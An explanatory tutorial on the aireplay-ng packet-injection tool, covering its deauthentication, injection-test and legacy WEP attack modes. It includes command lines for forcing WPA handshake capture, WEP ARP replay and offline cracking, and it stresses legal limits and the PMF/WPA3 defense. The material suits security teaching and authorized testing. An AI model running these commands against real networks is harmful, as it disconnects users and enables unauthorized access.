aireplay-ng is the packet-injection tool of the aircrack-ng suite. Within the suite it owns the single job of "transmitting frames into the air." Its work splits into two parts: (1) generating and replaying traffic to accelerate WEP key recovery, and (2) deauthenticating (forcibly disconnecting) clients to force a WPA/WPA2 4-way handshake capture. The captured handshake is recorded by airodump-ng, then cracked offline by aircrack-ng / hashcat — aireplay-ng is the detonator that makes a client "drop and reconnect." It requires monitor mode (set up with airmon-ng) and an adapter that supports packet injection. Attack modes are chosen with the number flags -0 through -9.
It looks complex, but the essence is three things. (1) aireplay-ng is the "frame sender" of the aircrack-ng suite. Scanning is airodump-ng, cracking is aircrack-ng, and transmitting is aireplay-ng — the roles are split. (2) The most-used mode is -0 (deauth) = disconnect a client once so it reconnects, and capture the WPA handshake at that moment. (3) Firing at someone else's Wi-Fi is, in Japan, a violation of the Radio Act Article 109 (radio interference) and the Unauthorised Computer Access Act. Practice only on your own AP / an authorized pentest target / a lab. Build on this and open each chapter in turn.
What aireplay-ng is — the suite's injector #
aircrack-ng is not a single tool but a collection of commands (a suite) that divides up wireless auditing. Within it, aireplay-ng specializes in one thing: injecting frames into the air.
| Suite tool | Role |
|---|---|
airmon-ng | Switch the wireless interface into monitor mode |
airodump-ng | Scan nearby APs / clients and capture/record handshakes etc. |
aireplay-ng | Inject frames (this article) — deauth / replay / injection test |
aircrack-ng | Crack captured WPA handshakes / WEP IVs offline |
aireplay-ng is not a tool that "takes" something, but one that "causes" something. Deauthing a client causes a reconnection, which airodump-ng records. Injecting ARP into WEP increases traffic, which builds up IVs. In other words, aireplay-ng supplies the "fuel" that makes airodump-ng (capture) and aircrack-ng (analysis) effective.
wifite, which fully automates Wi-Fi attacks, internally calls aireplay-ng to deauth clients and trigger handshake captures. Rather than using wifite as a "convenient but opaque" box, understanding what aireplay-ng's -0 does lets you drop down to the manual tool and diagnose the cause when wifite stalls. See the wifite explainer for details.
Prerequisites — monitor mode and an injection-capable adapter #
To run aireplay-ng you need two things: (1) put the wireless interface into monitor mode, and (2) use an adapter that supports packet injection.
A wireless card in normal (Managed) mode handles "only frames addressed to itself," but in monitor mode it can observe every frame in the air and transmit arbitrary frames. The tool that sets this up is airmon-ng.
$ sudo airmon-ng check kill
# stop interfering processes (NetworkManager / wpa_supplicant)
$ sudo airmon-ng start wlan0
# → a monitor-mode wlan0mon is created
# from here, aireplay-ng's last argument is wlan0mon (the monitor IF)Because aireplay-ng is a tool that "sends" frames, you need not just monitor mode but an adapter that supports packet injection. Many laptop built-in Wi-Fi chips do not support injection. Common chips include the Atheros AR9271 (TP-Link TL-WN722N v1) and the Realtek RTL8812AU (5GHz-capable). Before firing anything, always confirm with an injection test (-9) whether the card can actually inject (see later chapters).
Legal and ethical considerations — read this first #
aireplay-ng actually transmits radio and forcibly disconnects (deauths) other people's clients. Precisely because it runs so easily, you must clear the legal bar first. Performing packet injection or deauth against someone else's Wi-Fi without permission can be a clearly illegal act in Japan.
- APs / home LANs you own or administer — a router you bought and set up, an isolated learning lab.
- Targets you have explicit written permission for — a pentest or wireless-assessment contract where the scope (target SSIDs, period, techniques) is documented.
- Legitimate learning platforms / hardware labs — a test AP you stood up yourself, where the owner permits it.
aireplay-ng's -0 (Broadcast Deauth) can disconnect even unrelated clients in range. Even "just trying it" in a cafe or apartment can mean Radio Act Article 109 (transmitting radio with the intent to interfere with others' communications = radio interference) or the Unauthorised Computer Access Act, and — if you go as far as an Evil Twin — obstruction of business. For the details of the legal status of deauth, see the Deauthentication Attack explainer. Always confirm the target and your authorization first.
The attack modes — selected by number flag #
aireplay-ng's attack modes are selected by a number flag (with the long-form alias in parentheses). In practice today almost everything is -0 and -9; -1 through -5 are relics of the WEP era but are useful for understanding the mechanics.
| Mode | Alias | What it does | Main use |
|---|---|---|---|
-0 | --deauth | Send a given number of deauths (0 = send continuously) | Current WPA handshake capture / DoS |
-1 | --fakeauth | Establish a fake authentication with the AP (associate your card) | WEP — make the AP accept injected frames |
-2 | --interactive | Interactively choose a captured frame to replay | WEP — re-inject an arbitrary frame |
-3 | --arpreplay | Capture an ARP request and re-inject it to generate many IVs | WEP acceleration (classic) |
-4 | --chopchop | KoreK chopchop — decrypt a WEP packet without the key | WEP |
-5 | --fragment | Fragmentation attack — obtain PRGA keystream | WEP |
-9 | --test | Injection test — verify the card can inject and reach the AP | Run first Sanity check |
To specify targets and options, you use flags common across modes. They are easy to confuse, so keep their roles distinct.
| Flag | Meaning |
|---|---|
-a <BSSID> | The AP's MAC address (BSSID) |
-c <CLIENT MAC> | The target client's MAC (targeted deauth. Omit it for a broadcast deauth of all clients) |
-b <BSSID> | BSSID used as a filter in the replay modes (-3/-4/-5) |
-h <SOURCE MAC> | The source MAC to transmit from (usually your card's MAC, or an associated client) |
-e <ESSID> | The target network name (e.g. needed for fakeauth) |
-x <pps> | Cap on packets per second (rate control — be gentle, avoid flooding) |
| Last argument | Always the monitor-mode interface (e.g. wlan0mon) |
In practice — WPA handshake capture (-0) and injection test (-9) #
The lead role today is the attack on WPA/WPA2. You cannot steal the key from the air directly, but you can break it via the path disconnect a connected client once → capture the 4-way handshake on auto-reconnect → crack offline with a dictionary/GPU. What causes that "disconnect" is -0 (deauth).
First, the injection test (-9) #
Before firing anything, confirm the card can actually inject and that your radio reaches the target AP.
$ sudo aireplay-ng -9 wlan0mon
# if "Injection is working!" plus AP responses appear, injection is OK
# if it fails here, suspect the adapter / driver / distanceThe practical WPA handshake-capture flow #
Use two terminals. Terminal 1 captures (airodump-ng), terminal 2 injects deauths (aireplay-ng).
$ sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon
# -c 6 lock to the target AP's channel
# --bssid the target AP's BSSID
# -w cap save to cap-01.cap; "WPA handshake" top-right means success$ sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# -0 5 send 5 deauths (use 0 for continuous)
# -a the target AP's BSSID
# -c the target client's MAC (omit to broadcast to all)
# → the client drops and reconnects → handshake lands in cap-01.capRather than continuously broadcast-deauthing everyone (omitting -c), it is better to fire just a few shots at one connected client by specifying -c; that reduces both the collateral on unrelated devices (= legal risk) and detection. The handshake is captured the moment a single reconnect occurs, so there is no need to flood. After capture, move to offline analysis with aircrack-ng -w wordlist.txt cap-01.cap or hashcat -m 22000. The mechanics of deauth itself are detailed in the Deauthentication Attack explainer.
Legacy WEP attacks (-1 / -3) #
-1 through -5 are the modes for breaking WEP (Wired Equivalent Privacy). WEP, through flaws in RC4 and a short IV (initialization vector), can have its key cracked statistically once you gather enough IVs. The catch is that "on a quiet AP, IVs never accumulate." So aireplay-ng artificially generates traffic to accelerate IV collection. WEP APs are essentially nonexistent today, so treat this as a historical, educational subject.
A typical WEP attack is the two-step fakeauth to associate with the AP (-1) → ARP replay to mass-produce IVs (-3).
-1 you associate your card via a fake authentication, laying the groundwork for the AP to accept your injected frames.aircrack-ng cap-01.cap recovers the WEP key statistically in minutes.# (1) associate with the AP via fakeauth (-1 0 = immediate)
$ sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
# -h is your own card's MAC (the source)
# (2) capture an ARP request and re-inject it → mass-produce IVs
$ sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
# -b is the target AP's BSSID (the replay filter)-2 (interactive) replays a captured frame you pick interactively; -4 (chopchop) and -5 (fragment) are advanced WEP attacks that extract keystream or packet contents without knowing the key. All exploit WEP's structural flaws and do not work against WPA2/WPA3. WEP has long been deprecated, so think of these as teaching material for "why WEP collapsed."
Where it sits in the suite, and being neutralized by PMF #
aireplay-ng is not self-contained. Within the flow airmon-ng → airodump-ng → aireplay-ng → aircrack-ng, it is the single step that handles injection.
| Step | Tool | What it does |
|---|---|---|
| 1. Prep | airmon-ng | Monitor mode (wlan0 → wlan0mon) |
| 2. Recon | airodump-ng | Identify BSSID / channel / clients and start capturing |
| 3. Inject | aireplay-ng | -0 to deauth, or -1/-3 to accelerate WEP |
| 4. Analyze | aircrack-ng / hashcat | Crack the handshake / IVs offline |
| (fully automated) | wifite | Bundles all of the above into one command |
aireplay-ng's -0 relies on the historical 802.11 flaw that "deauth management frames are sent in plaintext and unauthenticated, so they can be spoofed." On an AP with PMF (Protected Management Frames, 802.11w) enabled, spoofed deauths are rejected by MIC verification and the client is not disconnected. Because WPA3 makes PMF mandatory, in a WPA3 environment a forced handshake capture via -0 generally does not work. The Deauthentication Attack explainer covers in detail why PMF neutralizes it, all the way to the defender's configuration.
aireplay-ng is the injector of the aircrack-ng suite: for WPA it uses -0 to drop a client so the handshake is captured; for WEP it uses -1/-3 to mass-produce traffic and build up IVs. Confirm injection with -9 before firing anything, and keep deauth to a few targeted shots. And firing at someone else's Wi-Fi is a violation of Radio Act Article 109 / the Unauthorised Computer Access Act — practice only on your own AP or an authorized pentest target. Once you understand the mechanics, using its automated form, wifite, makes the whole picture clear.
